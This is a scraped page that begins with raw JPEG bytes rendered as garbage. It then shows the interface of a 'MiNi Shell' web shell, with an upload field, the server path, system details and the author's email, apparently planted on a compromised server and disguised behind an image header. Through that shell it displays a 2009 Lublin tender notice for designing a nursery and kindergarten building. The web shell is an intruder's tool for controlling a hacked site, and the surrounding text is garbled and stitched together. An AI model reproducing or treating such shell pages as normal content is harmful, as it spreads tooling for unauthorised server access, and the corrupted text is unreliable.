JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090930/340006-N-2009.html

<p class="kh_header"><b>Lublin: Opracowanie wielobranżowej dokumentacji projektowej budynku żłobka i przedszkola, wraz z realizacją zagospodarowania, urządzenia i uzbrojenia terenu    w dzielnicy Felin w Lublinie.</b><br>
<b>Numer ogłoszenia: 340006 - 2009; data zamieszczenia: 30.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Lublin , Pl. Łokietka 1, 20-950 Lublin, woj. lubelskie, tel. 081 4663000, faks 081 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie wielobranżowej dokumentacji projektowej budynku żłobka i przedszkola, wraz z realizacją zagospodarowania, urządzenia i uzbrojenia terenu    w dzielnicy Felin w Lublinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje: 
1. Opracowanie wielobranżowej dokumentacji projektowej budynku żłobka i przedszkola, wraz z realizacją zagospodarowania, urządzenia i uzbrojenia terenu     w dzielnicy Felin w Lublinie.
2. W zakres opracowania wchodzi:
a) opracowanie projektu budowlanego budynku łączącego funkcję żłobka i przedszkola wraz z zagospodarowaniem, urządzeniem i uzbrojeniem terenu oznaczonego w planie zagospodarowania UP/UC oraz projektu budowlanego odwodnionego i oświetlonego ciągu pieszego i ścieżki rowerowej na terenie oznaczonym w planie zagospodarowania KX (odcinek od ul. Wł. Jagiełły do zaprojektowanej ul. Zygmunta Augusta), w oparciu o program funkcjonalno-użytkowy i zgodnie z ustaleniami miejscowego planu (część graficzna i tekstowa) zagospodarowania przestrzennego miasta Lublina - część IV, zatwierdzonego uchwałą nr 628/XXIX/2005 Rady Miasta Lublin z dnia 17 marca 2005 roku - branże architektoniczna, konstrukcyjna, sanitarna, elektryczna (w tym niskoprądowa), drogowa - (w 7 egz.) w tym BIOZ i charakterystyka energetyczna budynku,
b) opracowanie projektu wykonawczego budynku łączącego funkcję żłobka i przedszkola wraz z zagospodarowaniem, urządzeniem i uzbrojeniem terenu oraz projektu wykonawczego odwodnionego i oświetlonego ciągu pieszego                   i ścieżki rowerowej - branże architektoniczna, konstrukcyjna, sanitarna, elektryczna (w tym niskoprądowa) , drogowa  - (w 4 egz.),
c)projekt technologii wyposażenia budynku żłobka i przedszkola - (w 6 egz.),
d) kosztorysy inwestorskie i zbiorcze zestawienie kosztów (w 2 egz.) - we            wszystkich branżach,
e) przedmiary robót (w 2 egz.) - we wszystkich branżach,
f) formularze kosztorysów ofertowych (w 2 egz.) - we wszystkich branżach, (powinny zawierać dwie, niewypełnione, dodatkowe kolumny: cena jedn., wartość, oraz w kolumnie podstawa w każdej 	pozycji należy podać odpowiedni numer szczegółowej specyfikacji technicznej wykonania i odbioru robót) - we wszystkich branżach,
g) szczegółowe specyfikacje techniczne wykonania i odbioru robót (w 3 egz.) - we wszystkich branżach,
h) dokumentacja geotechniczna (w 3 egz.),
3. Całą dokumentację przekazać inwestorowi również na nośniku elektronicznym (kosztorysy - możliwe do odczytania w programie NORMA).
4. Dokumentację projektową z zagospodarowaniem, urządzeniem i uzbrojeniem terenu opracować we wszystkich branżach obejmując: kubaturę, małą architekturę z placami zabaw dla dzieci i ogrodzeniem, instalacje wewnętrzne, przyłącza i sieci, z rozwiązaniem ewentualnych kolizji, miejsca parkingowe, drogę wewnętrzną, zieleń, odwodnienie i oświetlenie terenu, zasilenie energetyczne placu budowy, technologię wyposażenia budynku oraz odwodniony i oświetlony ciąg pieszy i ścieżkę rowerową.
5. Wykonawca zobowiązany jest do pozyskania we własnym zakresie i na własny koszt matrycy lewostronnej w skali 1:500 dla celów projektowych i uzgodnień oraz warunków technicznych zasilania obiektu w media (energię elektryczną, co, cw. i wod.-kan.), oraz odprowadzenia wód 	deszczowych.
6. Opracowanie dokumentacji będącej przedmiotem zamówienia, należy wykonać zgodnie z ustaleniami miejscowego planu (część graficzna i tekstowa) zagospodarowania przestrzennego miasta Lublina - część IV, zatwierdzonego uchwałą nr 628/XXIX/2005 Rady Miasta Lublin z dnia 17 	marca 2005 roku oraz w oparciu o program funkcjonalno-użytkowy.
7. Opracowanie winno uwzględniać nowoczesne rozwiązania technologiczne oszczędzające zużycie energii i naturalnych zasobów wodnych.
8. Dokumentacja projektowa ma być zgodna z aktualnie obowiązującymi warunkami technicznymi, przepisami prawa budowlanego, przepisami szczegółowymi, normami i posiadać uzgodnienia określone przepisami szczególnymi 	umożliwiającymi uzyskanie pozwolenia na budowę i późniejszą eksploatację..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.1.Warunkiem udziału w postępowaniu jest spełnianie postanowień określonych w art. 22 ust. 1 Prawa zamówień publicznych, a w szczególności  następujących wymagań:
1.1.1.dysponowanie osobami, które będą uczestniczyć w wykonywaniu zamówienia posiadającymi odpowiednie uprawnienia budowlane do projektowania w specjalności:
1.1.1.1. architektonicznej - min. 1 osoba,
1.1.1.2. konstrukcyjno-budowlanej - min. 1 osoba,
1.1.1.3. drogowej - min. 1 osoba,
1.1.1.4. instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych - min. 1 osoba,
1.1.1.5. instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych - min. 1 osoba,
1.1.1.6.instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych - min. 1 osoba,
1.1.1.7.instalacyjnej w zakresie instalacji i urządzeń wentylacyjnych - min. 1 osoba,
1.1.1.8.instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  - min. 1 osoba,
1.1.1.9.telekomunikacyjnej - min. 1 osoba,
(podstawa prawna - art. 14 ustawy Prawo budowlane z dnia 7 lipca 1994 r. (tekst jednolity Dz. U. z 2006 r. Nr 156, poz. 1118 ze zmianami), a także posiadającymi ważne zaświadczenia o przynależności do Okręgowej Izby Architektów (pkt 1.1.1.) oraz do Okręgowej Izby Inżynierów Budownictwa (pkt 1.1.2.-1.1.9.).
1.1.2.wykonanie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 1 dokumentacji projektowej o wartości co najmniej 100 000,00 zł brutto budowy budynku przedszkola lub żłobka lub szkoły.                     
1.2.Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona 
w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. 
1.2.1.Oferty wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające spełnianie wymaganych warunków zostaną dopuszczone do badania i oceny.
1.2.2.Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających spełnianie wymaganych warunków zostaną wykluczeni z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1.Oświadczenia:
1.1.1.Oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych potwierdzające, że wykonawca:
1.1.1.1.posiada uprawnienia do wykonywania działalności w zakresie objętym przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.1.1.2.posiada niezbędną wiedzę i doświadczenie oraz: 
a)dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, 
lub
b)dysponuje potencjałem technicznym oraz przedkłada w załączeniu pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, 
lub
c)dysponuje osobami zdolnymi do wykonania zamówienia oraz przedkłada w załączeniu pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego, 
lub
d)przedkłada w załączeniu pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
1.1.1.3.znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.1.1.4.nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych.
1.2.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, należy złożyć następujące dokumenty:
1.2.1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.3.W celu potwierdzenia opisanych przez zamawiającego warunków posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, należy złożyć następujące dokumenty:
1.3.1.Właściwe uprawnienia budowlane do projektowania w specjalności:
1.3.1.1.architektonicznej wraz z ważnym zaświadczeniem o przynależności do Okręgowej Izby Architektów, 
1.3.1.2.konstrukcyjno-budowlanej,
1.3.1.3.drogowej,
1.3.1.4.instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych, 
1.3.1.5.instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, 
1.3.1.6.instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,
1.3.1.7.instalacyjnej w zakresie instalacji i urządzeń wentylacyjnych,
1.3.1.8.instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
1.3.1.9.telekomunikacyjnej,
wraz z ważnymi zaświadczeniami o przynależności do Okręgowej Izby Inżynierów Budownictwa (dotyczy pkt. 1.3.1.2 - 1.3.1.9.) 
1.3.2.Wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dokumentacji projektowych o wartości co najmniej 100 000,00 zł brutto na budowę budynku przedszkola lub żłobka lub szkoły z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie.
1.4.W przypadku usług wykonywanych uprzednio w ramach konsorcjum i spółek cywilnych wykaz usług  określony w pkt. 1.3.2 winien potwierdzać doświadczenie wykonawcy(ów) składającego(ych) ofertę tzn.: w przypadku zamówienia wykonywanego wspólnie z innym bądź innymi wykonawcami, wykaz powinien wskazywać jedynie zakres i wartość prac wykonanych przez wykonawcę(ów) składającego(ych) ofertę w tym postępowaniu.
1.5.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1.5.1.Dokumenty wymagane w pkt 1.2.1. winien złożyć każdy wykonawca.
1.5.2.Oświadczenie / oświadczenie i zobowiązanie określone w pkt 1.1.1. oraz dokumenty wymagane w pkt 1.3.1.-1.3.2. winny być złożone wspólnie przez wykonawców.
1.6.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1.2.1 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
1.7.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1.6, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy dotyczące terminów wystawienia stosuje się odpowiednio.
1.8.Wszystkie powyższe dokumenty winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę - poświadczenie winno zawierać zapis odręczny lub w formie pieczęci za zgodność z oryginałem. W przypadku składania elektronicznych kopii dokumentów powinny być one opatrzone przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
1.9.Dokumenty sporządzone w języku obcym winny być składane wraz
z tłumaczeniem na język polski, poświadczonym, przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych U M Lublin, Plac Litewski 1, pokój nr 3 po wcześniejszym dokonaniu wpłaty 15 zł w kasie UM Lublin ul. Wieniawska 14 lub za zaliczeniem pocztowym (15 zł + koszt przesyłki).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2009 godzina 09:30, miejsce: Biuro Zamówień Publicznych U M Lublin, Plac Litewski 1, pokój nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Osobami upoważnionymi do kontaktowania się z wykonawcami są:
1.1.W zakresie przedmiotu zamówienia: P. Genowefa Śmigowska - Wydział Inwestycji Urzędu Miasta Lublin, ul. Wieniawska 14, piętro X,
pokój nr 1008, telefon (081) 466-24-15,

Creat By MiNi SheLL
Email: jattceo@gmail.com